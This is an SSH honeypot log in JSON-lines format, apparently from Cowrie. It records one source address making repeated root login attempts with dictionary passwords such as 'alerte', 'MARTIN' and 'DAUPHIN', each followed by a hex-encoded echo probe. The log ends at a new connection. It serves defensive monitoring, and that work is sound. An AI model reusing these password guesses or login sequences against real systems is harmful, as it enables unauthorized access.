{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.223948Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.login.success","username":"root","password":"alerte","message":"login attempt [root/alerte] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.323708Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:10.385813Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.386517Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.409912Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.411190Z","src_ip":"212.227.125.160","session":"0bc59d9ea0f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38000,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc1cb1ec2953","protocol":"ssh","message":"New connection: 212.227.125.160:38000 (1.2.3.4:22) [session: cc1cb1ec2953]","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.432035Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.432949Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.455967Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.login.success","username":"root","password":"albina","message":"login attempt [root/albina] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.533410Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:10.599270Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.599933Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.624906Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.626143Z","src_ip":"212.227.125.160","session":"cc1cb1ec2953"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38004,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6fec3cf2d5c","protocol":"ssh","message":"New connection: 212.227.125.160:38004 (1.2.3.4:22) [session: e6fec3cf2d5c]","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.646758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.647410Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.673229Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.login.success","username":"root","password":"account1","message":"login attempt [root/account1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.746979Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:10.810314Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.811014Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.834655Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.835772Z","src_ip":"212.227.125.160","session":"e6fec3cf2d5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38016,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff1ee2a0a07a","protocol":"ssh","message":"New connection: 212.227.125.160:38016 (1.2.3.4:22) [session: ff1ee2a0a07a]","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.856486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.857329Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.880491Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.login.success","username":"root","password":"MARTIN","message":"login attempt [root/MARTIN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:10.954707Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:11.016304Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:11.017043Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:11.040928Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:11.042042Z","src_ip":"212.227.125.160","session":"ff1ee2a0a07a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38020,"dst_ip":"1.2.3.4","dst_port":22,"session":"10970f8bea63","protocol":"ssh","message":"New connection: 212.227.125.160:38020 (1.2.3.4:22) [session: 10970f8bea63]","sensor":"my-vps","timestamp":"2025-08-28T11:47:14.166383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:14.250947Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:14.273833Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.login.success","username":"root","password":"GILLES","message":"login attempt [root/GILLES] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:14.752634Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:15.511750Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.512497Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.652758Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.654145Z","src_ip":"212.227.125.160","session":"10970f8bea63"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38028,"dst_ip":"1.2.3.4","dst_port":22,"session":"de63681f79d8","protocol":"ssh","message":"New connection: 212.227.125.160:38028 (1.2.3.4:22) [session: de63681f79d8]","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.679914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.822517Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:15.823449Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.login.success","username":"root","password":"DELPHINE","message":"login attempt [root/DELPHINE] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.209025Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:16.410014Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.410714Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.466781Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.467785Z","src_ip":"212.227.125.160","session":"de63681f79d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38040,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d4b5fecf2bb","protocol":"ssh","message":"New connection: 212.227.125.160:38040 (1.2.3.4:22) [session: 9d4b5fecf2bb]","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.494744Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.508461Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.528996Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.login.success","username":"root","password":"DAUPHIN","message":"login attempt [root/DAUPHIN] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.649578Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:16.709221Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.710294Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.733918Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:16.735082Z","src_ip":"212.227.125.160","session":"9d4b5fecf2bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38042,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9123460c66b","protocol":"ssh","message":"New connection: 212.227.125.160:38042 (1.2.3.4:22) [session: d9123460c66b]","sensor":"my-vps","timestamp":"2025-08-28T11:47:20.885486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:47:20.886717Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-28T11:47:20.914677Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.login.success","username":"root","password":"Claude","message":"login attempt [root/Claude] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.024089Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:47:21.168679Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.169428Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.274551Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.276055Z","src_ip":"212.227.125.160","session":"d9123460c66b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41286,"dst_ip":"1.2.3.4","dst_port":22,"session":"405fb51cd0db","protocol":"ssh","message":"New connection: 212.227.125.160:41286 (1.2.3.4:22) [session: 405fb51cd0db]","sensor":"my-vps","timestamp":"2025-08-28T11:47:21.296723Z"}
